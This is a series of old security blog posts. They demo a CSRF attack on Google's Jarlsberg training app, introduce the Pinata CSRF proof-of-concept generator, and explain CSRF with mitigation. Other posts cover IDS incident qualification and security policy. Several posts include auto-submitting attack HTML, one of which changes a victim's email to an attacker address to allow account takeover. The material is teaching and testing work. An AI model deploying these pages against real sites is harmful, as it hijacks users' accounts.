Tuesday, May 11, 2010

CSRF Demo Video

This is a short demo video of how a CSRF attack works. I am using Google's Jarlsberg for this demo. Always get permission before performing any attacks.

The Jarlsberg application's "Add Snippet" functionality is vulnerable to CSRF. I am using simple img tags to add messages to the application - this mimics an attack whereby an attacker can add messages on behalf of the victim.

I am simulating a user who, while logged into the Jarlsberg application, is tricked into clicking a link (this particular link points to a web server running on my local machine). I then demonstrate through a proxy what happens to the traffic - you will note that the initial request goes to localhost, but when the img tag is parsed it loads the vulnerable URL, and the browser automatically appends the correct cookies to that request. You can use Pinata to generate the CSRF code here - though this instance uses the GET method, Pinata is much more useful for generating POST and multipart POST requests.
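For illustration, here is a minimal sketch of the kind of attack page used in the demo. The host, path and parameter name below are assumptions standing in for the real "Add Snippet" request you would capture:

<html>
<body>
<h1>Totally harmless page</h1>
<!-- Hidden GET request to the vulnerable application; the victim's
     browser attaches the Jarlsberg session cookies automatically -->
<img src="http://jarlsberg.example.com/addsnippet?snippet=CSRFed" width="1" height="1" alt="">
</body>
</html>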

If you are interested in Pinata, you can find it here - http://code.google.com/p/pinata-csrf-tool/


Wednesday, March 31, 2010

Pinata - A CSRF PoC HTML Generation Tool

After much laziness I have finally completed the CSRF tool. I have named it Pinata.

Overview:

- The tool generates proof-of-concept CSRF HTML from a given HTTP request. It automatically detects whether the request is a GET or a POST, with further validation to distinguish a standard POST from a multipart/form-data POST.
- The tool then creates an HTML page corresponding to the type of request.
- The GET CSRF HTML includes an IMG tag with its SRC set to the URL being tested.
- The POST CSRF HTML contains an auto-submitting JavaScript form with the names and values taken from the HTTP request. (Sketches of both kinds of output follow this list.)
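To give a feel for the output, here are rough sketches of the two kinds of PoC HTML; the host, path and parameter names are made up, and the markup Pinata actually emits may differ. For a GET request:

<html>
<body>
<!-- Rendering the image fires the GET request, cookies included -->
<img src="http://target.example.com/action?param=value" width="1" height="1">
</body>
</html>

For a POST request:

<html>
<body onload="document.forms[0].submit()">
<!-- The form auto-submits on load with the captured names and values -->
<form action="http://target.example.com/action" method="POST">
<input type="hidden" name="param" value="value">
</form>
</body>
</html>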


Working:

- It is a Python-based tool and needs Python installed. I developed it on Python 2.6 and recommend using that version.
- The tool consists of three files: pinata.py, markup.py and CSRFBody.txt.
- To install it, create a new directory such as C:\Pinata and copy all three files into it.
- pinata.py is the main file and should be run to generate the HTML.
- markup.py is called by pinata.py to generate the HTML. I did not develop it and take no credit for it - I would like to thank its developer, as it made my life much easier. NOTE: it should not be altered.
- CSRFBody.txt holds the HTTP request.
- To use the tool, go to the vulnerable page, create a request, and capture the HTTP request in your proxy. Copy this request, paste it into CSRFBody.txt, then save and close the file (a made-up example follows this list).
- Run the tool from the command line by typing C:\Pinata\pinata.py
- It should generate the HTML file in C:\Pinata\
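As a concrete example, CSRFBody.txt could hold a captured request like the one below; the host, cookie and parameter are invented for illustration:

POST /profile/update HTTP/1.1
Host: vulnerable.example.com
Cookie: SESSIONID=abc123
Content-Type: application/x-www-form-urlencoded
Content-Length: 25

email=dalek%40example.com

Running C:\Pinata\pinata.py against this should produce an auto-submitting POST PoC page in C:\Pinata\.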


Future Direction

- I look forward to your suggestions.
- Perhaps some features to beat Referer-header-based CSRF protection.
- This is essentially a hack, so I will work towards cleaning up the current code.


Questions:

- Let me know if you have any questions, or if it suddenly stops working for you.

Code:

You can download Pinata at the following URL:

http://code.google.com/p/pinata-csrf-tool/

Friday, December 4, 2009

CSRF and XSS Part 1

This is my take on CSRF and XSS.

A web search will turn up definitions like these:

CSRF: Exploits the website's trust of the user.
XSS: Exploits the user's trust of the web application.

What do these definitions actually mean? You will find more explanations, but they are all vague. So here is my take on the two; do let me know if it makes sense:

CSRF: Cross Site Request Forgery.

Before we actually talk about CSRF, let's cover a little background. Websites track their users by providing them with session IDs in the form of cookies, special form fields or some value in the URLs. These uniquely identify each user to the web application, which is important for the following two reasons:

1 - HTTP is a stateless protocol, meaning each transaction is discrete and complete, after which the HTTP session is terminated. If unsure, use Wireshark to capture your HTTP traffic - actually I recommend that you do that. This means that when you request a page and see "Done" or 100% in your browser's status bar, all the data has been transferred and all the HTTP sessions have been terminated. Thus there is no way for the web application, by itself, to keep track of who made what request.
2 - However, web applications want to provide you with the content you requested, in the context you requested it (to overcome this shortcoming of stateless HTTP). Meaning: if you are an anonymous user, you don't get to see the privileged pages; if you are an authenticated user, you get to see more; and if you are an administrative user, you get a lot more. All of this is tied to the session IDs or cookies which track you, and which essentially establish different levels of trust between you (or your browser) and the web application: anonymous user, no trust; normal authenticated user, some trust; administrative user, complete trust; and so on.

For the sake of simplicity I will keep my discussion to cookies as session identifiers. However, as I have noted before, they are not the only way a website can track a user, though they are most definitely the most common.
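To make this concrete, here is a sketch of the exchange; the host, path and cookie value below are made up for illustration. When you log in, the server's response sets the session cookie:

HTTP/1.1 200 OK
Set-Cookie: SESSIONID=8f3a2c91; path=/

From then on, every request your browser makes to that domain carries the cookie back automatically:

GET /inbox HTTP/1.1
Host: www.example.com
Cookie: SESSIONID=8f3a2c91

The application looks up SESSIONID and treats the request as coming from the logged-in user.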

Now on the client side, your browser takes care of cookie management, making sure that the correct session IDs are passed to the correct websites, so that you can surf in peace, harmony and security. Cookies are scoped to the website (domain) that set them - meaning that whenever a request from the browser goes to a domain for which it holds session cookies, the browser will automatically append the relevant cookies, regardless of which page triggered the request.

Want to see it at work? For most applications without any CSRF protection, if you copy a trusted link and open it in another tab or window of the same browser, it will take you to the original web page (this is not always true - it is just an example). I am pretty sure you have done this a few times. If you are in an authenticated section of some website, right-click a protected link and select "open in a new window". The browser automatically appends all the correct session data to the new window's request, and because that request has all the correct cookies, the web application trusts it and displays the content. The web application only notes that a browser with all the right session identifiers (cookies) is making a request; it has no way of knowing that the requests are coming from two different browser windows (remember, HTTP is stateless).


Attack Scenario: An attacker wants to gain access to a user's profile. He figures this can be done by resetting the user's password, after first changing the secondary email address in the profile tab. This relies on a very common security feature whereby you can request a password reset by following the "forgotten password" link; a temporary password is then sent to the alternate email address already present in the profile.

The attacker - who, by the way, goes by the name of Dalek - knows that this particular website feature is vulnerable to CSRF. To exploit it, he uses a proxy to capture all the traffic his browser is sending out. A proxy is the first and most important tool you will need if you are thinking of testing web applications. It essentially sits between your browser and the websites: all traffic goes through the proxy to the website, and you have the ability to intercept and edit traffic on the fly.

We assume that the attacker also has an account on the same website - pretty common for webmail, social networking sites and so on, where all users have more or less the same access rights. To generate an actual attack page, the attacker changes his own email address and sends that request, but catches it in the proxy instead. He then converts the captured request into an HTML page that would regenerate it - a fairly straightforward process if you know what you are doing; I wrote a script to do exactly that (more on this later). The attacker then edits the page to set an email address of his choosing.
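For this scenario, the generated page could look something like the sketch below; the endpoint and field name are invented here, and the real ones would come straight from the captured request:

<html>
<body onload="document.forms[0].submit()">
<!-- Hypothetical change-email request; the victim's browser will
     attach her session cookies when the form submits -->
<form action="http://vulnerable.example.com/profile/update" method="POST">
<input type="hidden" name="secondary_email" value="dalek@evil.example.com">
</form>
</body>
</html>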

Dalek hosts this page somewhere, inviting a victim to visit it by suggesting that it offers coupons for chocolate-covered marzipan. We assume that the victim is logged on to the vulnerable site when she receives this invitation and, being a sucker for good marzipan, she clicks the evil link.

Since she is logged in to the vulnerable website, clicking the link generates a request to change the email address on her profile. The browser sees that the request is destined for the vulnerable site and, since the victim - Rose - is already logged in, automatically appends all the correct session information and forwards the request to the vulnerable application. And that is about it - she just got CSRFed. Rose unwillingly performed an action in her own context (the website's trust).

Let us revisit the CSRF definition: exploits the website's trust of the user. Trust is established through session IDs - the application trusts the session IDs presented by the browser, and that is exactly what the attack abuses.

Mitigation - Use unique ephemeral tokens for each sensitive function on your web application.
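As an illustration, a protected form could carry a server-generated token like the made-up one below. The server rejects any submission whose token does not match the one it issued for that session, and an attacker's page has no way to read the correct value:

<form action="/profile/update" method="POST">
<!-- Hypothetical anti-CSRF token, freshly generated by the server;
     a forged cross-site request cannot know this value -->
<input type="hidden" name="csrf_token" value="d41d8cd98f00b204e9800998ecf8427e">
<input type="text" name="secondary_email">
<input type="submit" value="Save">
</form>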
Cross Site Scripting (XSS)... will have to wait for now.

Thursday, July 30, 2009

Incident Qualification through IDS

We run an IPS here at work, but only in sniffer mode. I can see all the exploits flying through to different hosts. The vast majority of these exploits are simply run against hosts without any qualification of whether a particular vulnerability affects them, and even if a host is vulnerable, the exploit might be unsuccessful for whatever reason. This creates a lot of work: going through all the logs and then checking each host to determine whether there was an incident. I think it would be great if we had post-exploit traffic signatures that could qualify whether a particular host was compromised, thus creating an incident. This should not be too difficult; there are only certain things an attacker can do. As soon as the IDS sees a traffic stream going outbound to the attacker's source address after an exploit was executed, it should probably qualify it as an incident. This needs more research - perhaps someone else has already thought of it and there is a solution out there.

Update: I am seeing ever more vendors coming up with solutions where the vulnerability management system feeds into the IDS.

Sentinel and Snort - and now Qualys and TippingPoint.
Perhaps this is the future, but it still does not answer my original question: qualification of incidents based on post-exploit signatures. Perhaps you do need a SIM or SIEM for that - it is all about correlation.

Friday, October 3, 2008

Security Policies, Procedures, Guidelines and Standards

I have been an avid listener of almost all the famous security podcasts, and I have more often than not come across references to security policies; this post will specifically talk about those. First I must add that all the security podcasters are very knowledgeable and I have great respect for them, but at times there seems to be some confusion when they talk about security policies. Only today I was listening to an excellent podcast with some great content, but I found myself contemplating the podcaster's words. It was being suggested that security policies were not being updated to include new and emerging technologies, such as Web 2.0 systems.

There exist at least a couple of philosophies for developing security policies, but my take has always been to keep the security policy as lean as possible - like a constitution. Perform a risk analysis against your core business, then write your security policy to mandate protection against those risks. Once that is done, there should not be a need to update the security policy every time technology changes. I do agree that changes in the business might alter its risk profile and hence require a review of the security policy, but other than that the policy should remain pretty static.

Let me present an example. Say we have a company, and one of the ways it keeps its competitive edge is by keeping tabs on what is being developed in its R&D labs. All such information is tightly controlled and requires protection against unauthorized disclosure. A good security policy item for this requirement should be very simple and read something like:

- Security policy mandates protection against unauthorized release of data.

This one line in a security policy should be enough to cover all current and future technologies. Not only that, it requires procedures, guidelines and standards in all three areas of control - administrative, physical and technological - to ensure compliance with this single policy item.

On the other hand, procedures, guidelines and standards should continuously be added and updated to reflect any change in technology. Thus, if your employees start using Web 2.0 technologies to communicate, you do not have to go back and change your security policy to protect against that - in fact, you don't have to do anything at all, though I would advise against doing nothing. My take is that even though one doesn't have to do anything in the presence of a good security policy, it is always better to inform and update employees about your company's official stance, using some sort of advisory that refers to the original security policy item. If this is done properly, you will seldom have to go back and change your security policy, regardless of what technology throws at you.